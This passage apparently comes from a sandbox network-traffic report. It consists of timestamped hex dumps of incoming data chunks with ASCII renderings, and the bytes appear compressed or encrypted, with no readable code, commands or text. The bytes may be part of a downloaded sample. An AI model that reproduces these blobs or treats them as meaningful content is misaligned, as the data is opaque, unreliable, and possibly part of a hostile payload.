6f 39 04 d6 55 c2 f0 40 8d f8 79 76 09 85 d8 5e c6 6d 71 26 6a 3c 4e 00 be 41 8f d7 21 3b d0 d0 dc 54 cb ff f4 61 ab b8 23 13 5d 46 d7 11 6c 71 02 42 42 6c 3d 14 2d 2b 3c 7c 23 8a 46 b0 9c 77 59 7d e4 c2 d9 7e
                                                                                                                  Data Ascii: i1q9n\PK[8.+lP*j,Z}2p(#s"v"F"5pf,~V'*^ks!7/jFZ)7P^:C*l%Ijm#/yS^|&rMP(o9U@yv^mq&j<NA!;Ta#]FlqBBl=-+<|#FwY}~
                                                                                                                  2023-02-13 17:58:09 UTC50INData Raw: b6 15 10 d5 82 86 d4 09 5e 8b b3 12 bc 27 51 7e 3e fd b0 10 e0 fb 2d de 27 83 7f 3a 91 a6 cd 51 82 03 21 dc 00 71 6e 9d 23 55 7e 50 5e 53 7f c1 8e 78 48 9c 3c b4 7e f3 5a d5 19 3b 32 e5 99 5c 1e 23 0a c2 a0 82 85 2e b9 37 d2 93 85 8f 78 e9 3f 74 1b 20 c5 2d 00 e3 2e ec cf b9 76 19 66 59 6a 56 c9 e8 82 61 06 9f ad 5c 79 56 d5 9a 8b a3 60 2a c8 1e b7 44 02 5e d5 8c 4e 41 ff c0 82 4c 9e f6 bb 6d 5a 52 86 3d 33 ea 58 0b ff cc 11 3a 86 83 95 bf 05 8f 7f 72 54 48 a8 ad 7d 23 3c e4 e2 ba e1 75 2a 2e 36 4f 3d 04 33 33 cc 14 a2 a9 1f 8f 92 ff 01 f2 b6 e1 e5 b2 fb f4 3d fe 68 fa cf a5 dc 5a 4b d0 f3 9e b8 ff 11 67 46 09 d1 b2 a6 a9 95 36 d2 a5 af a7 f9 86 f1 66 02 6d 2e 58 64 f3 0f 9f 88 25 7b 53 91 9c c1 49 c7 22 b3 23 e1 c7 a0 70 97 0b e5 d4 ce 7e 62 10 25 1d 0e
                                                                                                                  Data Ascii: ^'Q~>-':Q!qn#U~P^SxH<~Z;2\#.7x?t -.vfYjVa\yV`*D^NALmZR=3X:rTH}#<u*.6O=33=hZKgF6fm.Xd%{SI"#p~b%
                                                                                                                  2023-02-13 17:58:09 UTC52INData Raw: 7f e9 0a 00 36 17 a4 fd 6d f0 18 2e 65 a4 ba 22 ca 36 6d ea 9c e8 f4 67 4c 12 36 ac ad 53 f7 59 1f f3 71 5e 95 0f 14 67 7e d6 fe 1e 6a 06 ae f9 e7 6b a4 6e 6f 25 de 53 b9 8d 3f f9 ff fc 90 82 ae d2 07 24 43 63 d9 22 ee 81 32 67 a7 86 b6 ab 64 ce 2f 38 8a 55 1a 4c 6a c7 4c 36 b2 6f 6d bc 3f 70 7e 9e 32 84 fc 8f 4a 5e e7 a0 fb 9d 7a 32 01 18 0a 66 cf 0a 1c cd 89 e7 05 7e e9 be 26 86 86 a3 de e8 d2 19 1f 5f 31 bc 01 00 d8 6b 73 49 64 81 89 f2 7e 63 05 a8 68 13 3b 5d 6c 60 14 4e 93 4e 76 b5 4f 32 77 47 42 06 3b 18 38 6f c7 b6 e4 31 7a 11 af a9 d1 90 53 f8 70 04 e8 bc 1d e2 a8 84 4f 1b aa 37 65 c8 e0 a9 2b 3b 66 9a 6e f2 6b b1 e8 0d 9d 90 ef f9 ba 4a f0 8c d5 68 b1 25 e5 be f6 d6 fa 5a b1 d1 37 8b 61 47 c8 56 ef 28 e7 fd 61 e5 9e 13 2f db 2d 56 59 10 3c c1 c3
                                                                                                                  Data Ascii: 6m.e"6mgL6SYq^g~jkno%S?$Cc"2gd/8ULjL6om?p~2J^z2f~&_1ksId~ch;]l`NNvO2wGB;8o1zSpO7e+;fnkJh%Z7aGV(a/-VY<
                                                                                                                  2023-02-13 17:58:09 UTC53INData Raw: a1 8d 82 5c 1a f4 31 0c 81 1c cf a7 b1 07 d7 5e d3 35 18 a0 38 02 43 a5 03 7e 01 cb 1f ad ca bb 3b ca 89 65 1d 87 e1 b8 b0 ec 40 ac fc 92 f2 a1 3b ef 04 72 60 65 dc 0a 30 61 9a c5 2a df f1 11 08 23 62 be 1c 4b 50 a1 e1 ce c8 82 50 ce 52 41 ac e1 3e 09 22 69 52 0f ec 54 43 67 9a d6 50 bf b0 86 0a 72 ac a1 fe 0e 14 a6 8f 5e 35 8e 8d 26 9d 69 3f 7e 97 86 fd 00 70 10 dd 02 da 75 39 24 9d 35 5e 41 89 2c da 05 d2 52 7d e6 c1 1c 01 54 bb eb 8b d9 22 0e 2b 79 96 60 8b ac 12 04 7b 63 b2 e2 75 54 ca 0d 86 77 07 8c 49 7d 5b b3 af 75 39 b4 dd f4 ad 07 a0 ee db 93 2d ed 4b 87 a4 6b d9 b2 c6 7a 04 5f e6 ab fd 5b 0c 7d 59 86 a3 34 4d 61 9c 33 a6 ff 30 d2 1a bd 72 c8 4d 9c 5c 63 ea d8 e2 4b be 8f 1e c3 7d b5 3c ff 7c be da 94 77 df ed ae 1e a5 31 35 0f c0 82 cc 06 b5 f1
                                                                                                                  Data Ascii: \1^58C~;e@;r`e0a*#bKPPRA>"iRTCgPr^5&i?~pu9$5^A,R}T"+y`{cuTwI}[u9-Kkz_[}Y4Ma30rM\cK}<|w15
                                                                                                                  2023-02-13 17:58:09 UTC54INData Raw: f0 c6 39 c4 e5 1e 3c 44 a3 eb 2f 2b 4c c8 3e 26 0e c8 81 38 79 9b f2 e8 f7 72 af 52 ef 78 e8 e4 03 14 30 ca 35 42 90 df ae 18 f4 27 be 7b 9c 2a 5b d0 18 f1 70 55 95 60 c3 2b a7 08 9a 90 fb 68 90 64 ec c7 74 d1 63 00 9f 22 6d 93 b9 da ba 87 bc a5 1f 71 75 4d d5 7c 05 48 eb ca c5 63 2a 4b 5d 23 01 ff 28 b6 c3 2d ec ff 58 50 03 d8 b0 b5 80 a3 45 1f 88 40 92 2f bc 05 a8 16 7d 62 1d 0c ae af 52 d4 93 c0 bd bf a1 9a 7a f6 e9 6d 4c 3d 64 7d 76 6e ba 49 06 8a 35 6e f9 6d 04 0f 6c f2 03 f5 ed 75 65 d1 e9 e0 8d 5e cf d9 a7 21 eb 5d 45 92 fd b6 0b 63 64 a5 10 ed 55 c8 97 dd b5 6f ea 05 b2 a7 02 5d a2 5a 25 e7 e5 25 2a 40 aa ed 5b d5 f6 54 df da ac a4 05 50 2b d2 b4 7f 8f 9d 49 e7 63 bd ef ce 67 cd 05 2c 4f 9a 48 b3 2f 83 0c c6 76 f4 68 25 21 9e 33 2e 9d 58 0a ba bd
                                                                                                                  Data Ascii: 9<D/+L>&8yrRx05B'{*[pU`+hdtc"mquM|Hc*K]#(-XPE@/}bRzmL=d}vnI5nmlue^!]EcdUo]Z%%*@[TP+Icg,OH/vh%!3.X
                                                                                                                  2023-02-13 17:58:09 UTC55INData Raw: 14 0c 0f 79 3f dc e6 8c b7 b9 4c 88 e4 f9 8c 26 e7 4e b5 56 fb 84 06 98 bc 66 19 ff 30 f7 46 29 2b f7 aa ef 0a 45 fd 11 f9 6b 6b f0 10 34 2e a2 64 bc ef 50 39 22 13 41 ab 6a 41 53 09 78 be a6 c1 27 ec 2d d6 35 df 37 c0 6a d7 91 f1 e9 c7 85 ca a3 ac d1 80 2d 45 f7 d4 6b 74 f3 b8 8c 83 41 50 b5 01 0d 4f 50 f4 c3 70 46 b7 f4 0f 5b f5 5b 67 6b 7f a0 58 71 3e 2d 15 bd d5 23 81 01 16 e3 f0 d8 f5 20 4d 58 e3 95 c3 ed 87 fd d8 ed 52 14 2c e0 97 e0 04 0a cc 8b 7d 12 a5 c2 99 4b ef 8f 3c e8 44 31 21 e1 f2 e3 52 f5 66 0e 1b 4d bf 9c 08 ce 7f d3 c1 b3 85 f3 05 6f f3 75 0a b4 cd b9 e4 2f cf a5 99 f7 a3 d9 54 69 c5 1d dc 7e 18 d5 ae 2c dc 09 5a 54 b0 ac 70 cf bc f7 a1 da 3f b8 01 eb 0d d0 e9 b1 62 54 f7 ca da 2c b0 11 f8 16 fc 29 b3 7e dc e4 cc a1 f0 ec bc ba aa 0a 37
                                                                                                                  Data Ascii: y?L&NVf0F)+Ekk4.dP9"AjASx'-57j-EktAPOPpF[[gkXq>-# MXR,}K<D1!RfMou/Ti~,ZTp?bT,)~7
                                                                                                                  2023-02-13 17:58:09 UTC57INData Raw: 03 e9 08 5c 1b 7e 91 db e6 d4 b1 5c 3a ce 2c c1 f0 81 d3 cc 94 b1 f7 da bf d3 92 55 b7 b0 4a c5 c0 ac 6f 87 5f d1 08 29 f6 a7 ed 38 9c 92 1d 22 24 6c de 00 46 c7 c7 53 ff 1d 95 55 a9 df eb 9b 5d e7 a8 9b c6 29 8c 2e 07 eb 72 d6 32 43 ae 6a b3 11 30 ed 73 3e 9f 35 99 52 a8 09 d0 35 f9 87 e6 e4 56 dc ae 8c 9c 11 6b c3 a4 44 4c b1 63 86 42 1e 68 ca 42 c3 60 b3 53 d5 f6 61 9f 5c 26 b2 77 ee 0e 2b c9 ad b8 b0 18 85 eb eb e6 4e 58 f8 38 f1 d7 bd 91 23 e3 25 e1 d7 7d 98 73 42 65 0f bb 2d 7f 5d c7 45 81 b1 3d 84 4f 1e b1 74 19 b1 7a 5d ff 7c b4 96 d5 98 ad ae 23 1d 31 33 fd de 27 ec 61 9e ea df 25 50 df 2f 68 93 54 0b c5 b3 ad cf 94 1f 4d c5 6b 6a 97 50 f1 7f 3f 3b d3 02 3b 0b f3 e2 6f 69 d5 b7 e1 68 b8 a3 66 32 55 4a 80 b1 5b 8f b8 1e 93 4c c7 c9 89 7a d3 fe 4b
                                                                                                                  Data Ascii: \~\:,UJo_)8"$lFSU]).r2Cj0s>5R5VkDLcBhB`Sa\&w+NX8#%}sBe-]E=Otz]|#13'a%P/hTMkjP?;;oihf2UJ[LzK
                                                                                                                  2023-02-13 17:58:09 UTC58INData Raw: 62 f8 6a c6 10 50 86 8e 20 12 2c ea ad b1 fc 31 11 ad 53 cd 2f ed 9e 3a 0b 74 4c 8e c2 2e f2 01 dc b2 60 6e 55 c8 c4 53 74 1d aa 5a ab 70 53 c5 32 d1 d2 1f 9e 31 76 7a 9a aa dd 2d ad 0c e5 ac 73 52 6b 20 06 d7 3d 87 0b 48 a0 e4 bf 1f 49 62 e9 bc 54 11 ad 8e ba 84 17 d5 ef d5 37 50 fe 12 b8 79 dd 11 ed e3 6f b9 19 75 ff 06 4a 42 f1 d2 9e 39 a1 67 d0 3c 6b a9 b9 d0 be bb bc 6b eb df 2a b3 59 02 39 e7 22 64 d6 8d 15 6f 67 19 36 01 7b 74 ed 18 ae 49 67 f8 c8 30 86 3b dd 54 eb 8c f1 aa 07 ce 55 c3 4f d7 14 eb a0 4f 2e 41 5d ee 6a a9 cf 13 da 87 32 2f c6 60 8c 32 c8 79 7e 57 06 53 19 bf b8 3e 37 f8 e6 89 c2 78 24 41 5f 60 51 5b fa 4d 3a d0 be de db e4 12 d5 91 8e 36 0b f3 48 b0 2b ee 50 27 6c 97 3b e1 23 ea 61 3c 2d 82 2f a9 68 b0 13 93 f2 54 a8 f7 92 53 0e 4e
                                                                                                                  Data Ascii: bjP ,1S/:tL.`nUStZpS21vz-sRk =HIbT7PyouJB9g<kk*Y9"dog6{tIg0;TUOO.A]j2/`2y~WS>7x$A_`Q[M:6H+P'l;#a<-/hTSN
                                                                                                                  2023-02-13 17:58:09 UTC59INData Raw: a2 19 b4 e9 fa a7 19 e1 c9 5b 8e 67 f3 03 aa 3a ea 2d 50 f1 e8 53 44 3d 64 14 fb c8 15 33 9c 68 49 e7 4f 88 a5 0b 7b 02 ee 20 15 41 18 b8 8c b9 65 e9 e0 52 94 65 22 66 0a bb 26 45 ae 2e 5b 4d 0c 42 d7 31 1f eb ab e1 15 ce 6d 66 31 af 76 16 3c cb 52 ba b5 7d 57 6c 30 7b ab 41 b8 64 61 a0 25 72 29 a7 28 e5 38 cf 3e 33 2f c1 45 82 f2 0f 4a 20 7c 53 7f d9 e2 86 48 d4 48 ae 2b 52 70 b5 78 86 eb 2c db 31 10 d3 91 e5 c0 4f 95 24 a0 4f fe 4c f7 e5 72 fd 83 6e b7 2f 5f 4c 33 01 04 92 a3 95 ca ba ea 7c 3a 0a 53 b5 1c e9 50 04 26 01 33 c5 0c 2b 3d 74 7c 28 82 7e 96 0d 36 a5 a4 68 d7 bf 6d 52 98 9c 6c bb 2f 1b 03 06 e7 fa b7 cd 9e 32 56 8b 37 c0 a9 33 a2 e7 e6 50 02 11 89 79 9a ab e8 f0 54 e7 4d 5e 93 c0 a7 e9 72 8e a2 be b9 d8 f6 e8 06 2e de 8f ad 18 a4 bf 5f 7b 4a
                                                                                                                  Data Ascii: [g:-PSD=d3hIO{ AeRe"f&E.[MB1mf1v<R}Wl0{Ada%r)(8>3/EJ |SHH+Rpx,1O$OLrn/_L3|:SP&3+=t|(~6hmRl/2V73PyTM^r._{J
                                                                                                                  2023-02-13 17:58:09 UTC60INData Raw: 01 ca 71 88 18 ee 88 33 da 37 0f 7f 9e 86 10 8a ec 17 e3 70 a8 84 1e a0 1d c2 ac 3d 7b 1a c7 85 70 cf 98 9a e2 e4 35 48 bb b4 bd 6d a1 88 b4 8f 4c 53 b1 82 c9 ea 2c c7 ae b8 87 31 90 48 20 16 88 aa 7a da d4 85 1e d4 af a6 fa 42 11 88 b6 dc 89 cd 84 9b a7 70 db ca 79 d4 b5 0d 26 05 28 5f 6a 1a e9 5f 89 3c a4 dc 2a b3 3f c2 7e 60 dd 13 7b 9c fa d2 66 48 61 3c fa ce 1c 96 09 dc 29 6f 78 60 ed 0d ff 56 3b 4d 3f 16 0e c4 35 bf a2 8f 50 da e0 54 d4 e8 7d 84 b2 15 b2 0e 80 c1 37 9d 2a 7c 66 5c c7 46 92 9d 55 db 7c 86 cf 34 8c 9b 10 92 aa 3f 90 1f 72 22 2e 18 3e dd 83 fc 2c 5e d0 9d 25 cd 8a 70 8d 86 fe 73 47 ef 6c 0e 16 1e 14 ac 6d 80 8f 18 1f 79 0a 98 c1 ed b6 6b 13 76 6e 1d 23 fc fe cf 74 d2 3b a6 75 b2 1e 72 7e f8 46 0d 15 62 df b1 a7 48 b8 1a d9 b7 5c a4 fb
                                                                                                                  Data Ascii: q37p={p5HmLS,1H zBpy&(_j_<*?~`{fHa<)ox`V;M?5PT}7*|f\FU|4?r".>,^%psGlmykvn#t;ur~FbH\
                                                                                                                  2023-02-13 17:58:09 UTC61INData Raw: 0b 2a b0 c0 8b 81 cc a0 ec 3d 76 1a 61 18 ed a5 fe f8 bb 9e 04 d0 d0 08 bb 81 54 1b 48 0a a6 5d 65 28 8f ba 75 e0 4c 26 3a bf 51 d3 27 6e 2f 7a a8 89 97 fe 0b 96 ba 2a 94 43 c1 47 aa 2f 4e d3 3e be a6 79 61 a3 fc 91 d3 02 5f 44 37 24 7e ef d6 04 06 ce 9b e7 96 d9 1d a2 12 b3 76 71 ca 07 19 a7 4e 0f b5 29 fd 71 ba 1a f4 0c e7 e8 93 dc 54 d0 14 f8 3b f0 e9 d4 89 5e ae 5f a8 fc 31 90 11 90 46 96 e1 2e e0 cb 7d 57 76 07 3f e4 5c eb 00 bd cc 2b e3 d6 b0 b3 dd 7e 11 44 44 5f 0f 9b 8b f8 2d cc 5e dd 19 21 35 5e 89 7f 50 ce 36 fb ee 57 65 5b f8 d0 cd ba 6d d6 e7 69 72 dc 9b 54 2b 84 10 66 af 8b ae 9c 69 c8 2e 60 a2 42 e7 01 56 ff 36 49 f9 0b 2f ad ab 3f 6f ab 5f aa 6d f2 1e 75 45 22 a9 4c 0d 4a be 30 04 cb bc 58 ad cf c9 29 60 34 2c aa d1 db 9e b6 74 16 74 17 6a
                                                                                                                  Data Ascii: *=vaTH]e(uL&:Q'n/z*CG/N>ya_D7$~vqN)qT;^_1F.}Wv?\+~DD_-^!5^P6We[mirT+fi.`BV6I/?o_muE"LJ0X)`4,ttj
                                                                                                                  2023-02-13 17:58:09 UTC63INData Raw: 94 d1 70 12 24 e7 c2 58 0d 8a 0a 06 dd 13 e1 ff 85 ea ac 19 2e e2 62 24 59 b4 18 ef 26 c9 29 dd 8c 14 eb fd f6 5b b7 73 88 e4 d0 f6 ec 77 1f 77 c8 1f 64 85 84 9f d8 35 82 e5 d9 ec 71 1c 5e 8b 53 76 dc 98 97 04 22 4b 1d d8 31 6a bf f4 b8 b0 33 79 7a 3c d5 65 df 2d 39 8f b5 3f ef 6e e1 c9 fd 12 43 1c fe 01 5d 60 cb 23 ae 4e 6a 2d c1 df 61 7f 06 91 99 74 ca 4e ec 38 00 d0 ee f8 30 7b d5 5b 3c bd b8 cb e5 20 ca e4 7c 76 d1 4e b0 3d eb eb 75 6b 3c 17 ef e9 79 6a 70 16 23 02 3c 55 d1 88 f6 98 85 a5 93 15 ae a4 d2 4e 2e c1 a8 13 75 03 00 84 b1 82 15 39 37 f8 51 02 3b f1 d9 f1 90 f3 87 a3 e1 1f 7d 82 b9 75 43 54 21 5b 5e b6 f6 f5 8b 15 1e 0c 84 bf f0 76 1d 13 57 a6 05 f4 9d 1f de b3 67 f6 3d 1e 25 20 ca 42 76 19 a7 2e 1d e3 b4 86 0c a0 0b d5 80 5d 27 5a cc 3e 17
                                                                                                                  Data Ascii: p$X.b$Y&)[swwd5q^Sv"K1j3yz<e-9?nC]`#Nj-atN80{[< |vN=uk<yjp#<UN.u97Q;}uCT![^vWg=% Bv.]'Z>
                                                                                                                  2023-02-13 17:58:09 UTC64INData Raw: 51 06 a4 e4 f2 6a 41 82 b9 7b 1b bb fc 57 8d 0d 70 b8 b6 74 54 b7 f9 93 e4 b0 d0 68 67 9d 36 82 53 05 d6 6e 87 54 b2 8a 03 f6 4b 92 01 36 27 28 50 c8 75 00 46 94 63 bc 0d 76 2c b4 a7 02 fc a7 fc 7e 8b 7f 03 da 0f 98 16 a0 67 a5 c9 9d cd d3 6f 64 3d 52 09 82 9c 5b 14 ec 0d 01 97 12 ac be 71 e3 2d dd 55 76 51 a1 10 4a 82 8b 83 c9 91 11 84 cd e2 04 cd 51 41 d8 66 a3 4b 4f 07 36 53 dd a8 5d eb 7d 86 77 4b 99 86 4f 88 fb c6 d1 36 40 e6 ed 07 52 1f 75 94 53 71 76 f5 63 7c 89 68 03 a9 a5 4b 11 80 76 fa d6 b9 f4 08 e2 99 ac 36 a2 b2 24 96 8d f6 e5 fe 73 af e8 36 c0 ae 1d 3f 8b 05 45 a2 8e c5 e7 90 18 f3 c2 7f 4e 21 ab 33 4b ba dd d4 c6 6d 6b 01 a4 99 d4 63 80 33 03 89 e9 50 77 b5 8c 52 f3 21 2c ee 9b 81 f0 4c cd f7 5e 1a 74 c9 fc 99 94 ad 04 42 e1 05 78 7e 51 47
                                                                                                                  Data Ascii: QjA{WptThg6SnTK6'(PuFcv,~god=R[q-UvQJQAfKO6S]}wKO6@RuSqvc|hKv6$s6?EN!3Kmkc3PwR!,L^tBx~QG
                                                                                                                  2023-02-13 17:58:09 UTC65INData Raw: 6c 07 79 b6 6c 53 79 15 53 55 dd 78 44 e8 99 7f 33 fc 9f ac 1b eb ff 5f 35 c7 5f 1b 61 f0 cf 3a 7d cf 2e c1 4c b4 41 03 8a a5 14 fe f3 e6 99 53 99 0d f3 eb af 29 ea 91 42 76 3f ac 35 cf 30 ef b7 6a ee 23 f3 30 5d 98 53 00 ee cf ca 47 8e fe 72 23 8e 50 31 48 22 70 49 cf 9a 2e d9 5f 21 a3
                                                                                                                  Data Ascii: lylSySUxD3_5_a:}.LAS)Bv?50j#0]SGr#P1H"pI._!
                                                                                                                  2023-02-13 17:58:09 UTC65INData Raw: 3c cf da 2a a3 96 5b c7 ca 16 c5 f4 9a 7b 85 1c 47 dc 99 75 b6 4b 4d 9c 3f 58 e7 7c 13 b0 10 45 4a 4e 06 f7 4b 81 24 dc 62 73 7b 32 42 de 82 3b d0 22 eb 0c d3 2b be 95 64 d3 d8 2a 67 94 87 c4 2a 63 ce b9 f7 fc db 66 42 44 13 23 cd 52 8e b3 97 4f 5a cb 96 1d dc a2 59 e2 4f de 50 cc eb 82 66 05 4a 94 ff 98 87 4c 72 21 14 48 2a b2 be 53 62 7e 71 f7 cb c3 8f 48 8f d8 ff fd 4f 50 ed 7e 20 b5 91 b0 a3 b3 6b 8a bb 28 b3 14 19 c0 68 52 24 9b a5 17 0c 06 cf 6f a9 ed 7e 4e 47 d0 9b 95 fd 57 9e 57 1e 9e 91 76 13 1f 02 85 db cb 5d 58 17 c3 68 af 97 2d 99 b5 2b fd 18 d9 da 0a 44 42 f1 49 34 61 ca be 7d 63 70 80 6d 62 46 b5 82 fd 4c c7 e3 e2 c8 46 32 6c e8 b3 c3 e7 40 e0 c8 bb c4 c9 25 cb 5f 3c fe 7c b3 e8 78 eb c5 d2 fd e2 20 32 5c c4 e2 d5 01 31 59 cf 80 20 cc 62 56
                                                                                                                  Data Ascii: <*[{GuKM?X|EJNK$bs{2B;"+d*g*cfBD#ROZYOPfJLr!H*Sb~qHOP~ k(hR$o~NGWWv]Xh-+DBI4a}cpmbFLF2l@%_<|x 2\1Y bV
                                                                                                                  2023-02-13 17:58:09 UTC66INData Raw: 0d ab d3 6f bd 6e 62 4a 8b 29 cd 13 8a a1 28 aa 2d 74 29 17 ed 52 6d 2a 52 e2 90 f5 ba 13 40 01 d6 98 2a 4a 20 e3 c4 0b fc cc 0c 60 60 62 e2 43 08 90 85 ca 16 02 15 e4 8f 00 ed c2 a8 c3 fe da 6f f8 a1 93 3e 85 4c 40 3f 54 10 ed cf b2 57 53 5e 12 fc b3 b9 ea 9f b0 b4 82 ae 26 84 81 5c c8 65 33 c5 80 0b fb 20 e2 c9 bd fc 3f f5 46 5a 69 c1 99 25 fc 48 74 64 86 b8 61 2d 3a 7c 54 c5 33 b3 78 53 63 e5 77 89 8a 39 6a a7 e6 4f f9 b4 f3 ab 13 e7 f0 d5 03 d9 88 24 c9 5b 35 7b 78 7b 4f cf 2a 17 bd 8b 6c ef 84 cf 10 14 40 32 55 fc b4 7c b2 5c 85 0b e8 27 58 e7 de 65 1d 4a ee 96 8d 7a 8d f3 67 7c 51 fe 3f fc 5e 06 3c 42 f8 db 89 64 ad f7 a1 f2 4e ed 0a 3b 86 26 83 a9 7d 05 76 d1 d6 88 c0 e6 5b 60 51 3c d4 ea fa 42 cc cf 9e 31 c3 c1 98 88 fb 67 3f 80 fa bc ee 56 45 6b
                                                                                                                  Data Ascii: onbJ)(-t)Rm*R@*J ``bCo>L@?TWS^&\e3 ?FZi%Htda-:|T3xScw9jO$[5{x{O*l@2U|\'XeJzg|Q?^<BdN;&}v[`Q<B1g?VEk
                                                                                                                  2023-02-13 17:58:09 UTC68INData Raw: a9 da 4d 69 3c 19 15 99 41 b6 28 33 da 40 a9 6c 13 46 93 00 1e 67 b3 39 8d 1f c9 8d 57 14 f7 51 4a 08 4a d0 04 bf 2c ff 8a d5 6f 87 7e 0b 2d 1d 73 e8 ab d8 cc f2 76 a7 7a 07 6f b6 e7 b0 26 18 0e 49 57 91 20 0f f9 de 36 9d e7 f8 65 2d b4 5e bc 13 44 85 cc fd 6b 7f cc d5 a7 37 f3 c5 e0 a5 8c bb 49 76 fc 90 56 3c d1 d5 44 d4 a3 86 56 3f 89 d2 b9 f6 e8 28 df be 54 ad d2 95 d3 00 48 eb 60 e3 14 3c c1 bc 13 52 9d e7 27 72 72 52 fe b5 88 8c 8b 99 74 0b 55 d7 64 37 62 fd 4a 0a 94 70 54 d3 f8 a6 d8 a1 ba a4 35 f4 e6 36 e3 12 32 98 68 71 40 31 e0 c2 2c 1a 69 e1 f1 5f e8 e0 28 ea bc 42 a1 76 ec c2 d0 51 fb 95 f4 c2 1b 4c f0 c1 01 d3 9f 26 91 c4 78 53 fe 93 24 3e 5f bf 2a 33 c7 cc 81 c6 74 3e 7b c7 c7 fb 03 ff 92 e8 17 33 6d 5f 38 fd e0 38 59 31 e5 9c fd a8 3e d7 2b
                                                                                                                  Data Ascii: Mi<A(3@lFg9WQJJ,o~-svzo&IW 6e-^Dk7IvV<DV?(TH`<R'rrRtUd7bJpT562hq@1,i_(BvQL&xS$>_*3t>{3m_88Y1>+
                                                                                                                  2023-02-13 17:58:09 UTC69INData Raw: f7 ff 2a b2 05 31 ea ef e7 25 b0 3b 9d 23 6a 7a df bd e6 b2 b4 a5 32 13 4c 49 f9 bb ff 46 08 f6 25 ab 68 da 8d 09 5e d7 e9 13 39 f9 c2 e9 36 25 02 8a e0 3e ac c2 09 4f f8 75 7a a6 31 e5 64 2d 95 ed 84 46 47 67 66 d0 1e 73 3e 29 d4 c6 98 f3 6e 69 c9 04 f8 04 a7 86 ba 2b e1 2e 72 80 01 09 5f c4 33 7b 6d 87 61 b1 61 10 09 3c 1a 42 b1 17 28 c3 28 a7 a0 38 5b 61 66 1c ec db db 94 87 75 ee 68 82 e0 82 84 d7 83 f2 5a 1a 09 36 e3 f8 09 88 a5 b9 08 80 a7 47 b9 63 24 f9 55 89 a9 2d c6 c7 2e a3 69 92 23 c1 00 c0 c7 bf c1 b3 5e 1f be d7 48 3c a5 19 ae 16 05 08 b5 1c c9 0f 2e 81 0e 74 99 ec 93 1c 0d 4b 6b 43 54 25 59 2e 86 65 96 69 93 36 ae 18 f4 e1 48 98 1b c9 16 5d 31 51 e1 cf 13 9b bd 57 6e 66 3b 8f 63 32 13 85 4c bb 39 44 81 cb ed 74 de 3c ac de eb 1f 6d 0b 8f 39
                                                                                                                  Data Ascii: *1%;#jz2LIF%h^96%>Ouz1d-FGgfs>)ni+.r_3{maa<B((8[afuhZ6Gc$U-.i#^H<.tKkCT%Y.ei6H]1QWnf;c2L9Dt<m9
                                                                                                                  2023-02-13 17:58:09 UTC70INData Raw: 24 a7 71 62 f3 e1 08 7d ce 27 4b 5d 99 a8 94 61 dc af 10 16 0c ff 4c 0d a1 c1 f1 7b 98 6f 1b 29 d3 c9 dd cb cb 68 f6 d1 79 2a 98 bc 9a 3e 0b d7 dd 75 2c 40 a0 12 34 fb 8b 3c a6 0c 5b 8b 9f e5 04 1e e3 9b be 8f 9c 8e 9f 04 e8 94 74 cc 9b 73 d1 07 3d bb a3 3f 91 ae 58 b2 9b 0c fd f0 62 9c de 6a a1 04 e0 4d 36 7d 5d a1 ec 79 6a 67 53 91 46 b1 03 0b c7 bf 2b 80 1e 63 28 f6 72 60 6b 50 10 3c 31 49 1e 70 2c 61 15 29 fd 0b 82 8c 10 ed dc e8 63 e4 a6 65 b8 0b 51 13 d4 00 e6 00 46 b9 d7 5c 66 3f 81 25 5a 11 b1 2b 13 64 29 fa 2e e1 b0 aa 6b 83 47 b9 67 ad 33 e3 a3 de 87 38 84 6b 46 cc 50 5e 16 af f2 59 a2 a9 f0 bd d8 c4 c6 1f e3 1e c8 c5 c6 50 bb 6a b5 3b db 6d b0 29 73 83 81 99 7e 38 27 f0 6c e1 3a ce 94 97 33 d5 4e 55 a3 a9 6c 1d 91 02 ce de a1 b1 da 02 77 4c 1c
                                                                                                                  Data Ascii: $qb}'K]aL{o)hy*>u,@4<[ts=?XbjM6}]yjgSF+c(r`kP<1Ip,a)ceQF\f?%Z+d).kGg38kFP^YPj;m)s~8'l:3NUlwL
                                                                                                                  2023-02-13 17:58:09 UTC71INData Raw: 00 ba dc 9f f0 d1 0b fb 26 7d 31 73 6b 80 3b 20 da 3f a9 29 21 ae 1c 0d 15 49 4d 19 ab 3e ec 1b a6 ad ae d4 3f aa 73 72 d5 86 c0 11 b3 16 84 4e c2 b1 99 ae 7d 94 3f bd d0 a9 d9 49 53 72 ce f5 c6 1b ed 53 b9 bf 0f c1 d3 6e ef 2f 21 d1 d8 a0 2d 00 7a df c6 08 b7 36 9f 79 7a 3f 03 b2 e3 0b ab 8e 30 ed 65 1c 8f 87 10 57 5e 05 68 4d c0 a1 22 03 75 55 31 ea 66 27 0f 8b bd ad 5d d7 70 cd 70 1c 39 e8 1f da 5d b9 c5 ba 0f 93 8f 99 ab 16 88 fe 64 2b a3 26 24 49 f3 7d 0d 0e 2d 6c f8 99 34 0f cd fc b3 93 a5 7e 7d 3c c7 73 cc 59 74 3c ba 24 f6 a3 57 83 4c a4 64 fd b4 8c 34 d9 b2 af 01 39 26 18 73 3e b2 17 aa 95 7c b1 7b c0 d1 62 aa 8a e0 2d 5d 0c 80 12 91 6e ae 04 23 29 c3 d1 46 8c 2f cf 7b a5 63 9e e8 81 11 28 e1 10 23 8c cb ed 9b 28 29 79 c5 9b 1e 9b 8d 9a 82 85 da
                                                                                                                  Data Ascii: &}1sk; ?)!IM>?srN}?ISrSn/!-z6yz?0eW^hM"uU1f']pp9]d+&$I}-l4~}<sYt<$WLd49&s>|{b-]n#)F/{c(#()y
                                                                                                                  2023-02-13 17:58:09 UTC73INData Raw: 71 94 50 10 70 57 62 37 92 c2 b7 5d c5 ef 5e 95 75 a0 85 24 22 8f 2e a8 17 dd c5 2a ca 28 d9 7d 62 38 3c 43 de d2 d5 db de c3 c2 2e f0 6c 5d 18 eb 0a 75 de b8 d6 39 b5 12 98 75 e8 83 35 b4 b6 e3 ca 87 79 1e c3 8a e4 79 85 ed 8d d3 c8 7b 1d e4 c2 53 f7 71 cc 81 e8 30 c9 f3 e5 86 d6 90 7c fc 89 06 67 2c f7 3b a6 23 7f 96 01 a9 0a 77 6e d1 51 21 44 c0 88 ac a7 af 44 82 fd a5 b6 71 5f 58 28 8e 8b 45 e8 bf b7 b2 e1 bb 45 ed 89 c3 4a f6 51 ff f2 2d fa 82 19 4c ea 02 55 b6 83 33 e3 12 f6 eb 0b bc 99 69 16 66 af 89 df 5b 27 75 52 2f b2 b5 3d 1b f6 fd 0e c8 c6 1f d8 06 43 fd 83 8d 6d 06 ed 95 2e b3 c4 c9 dd 6d 2d b9 33 95 a6 9d fe 9f f2 f8 0c 12 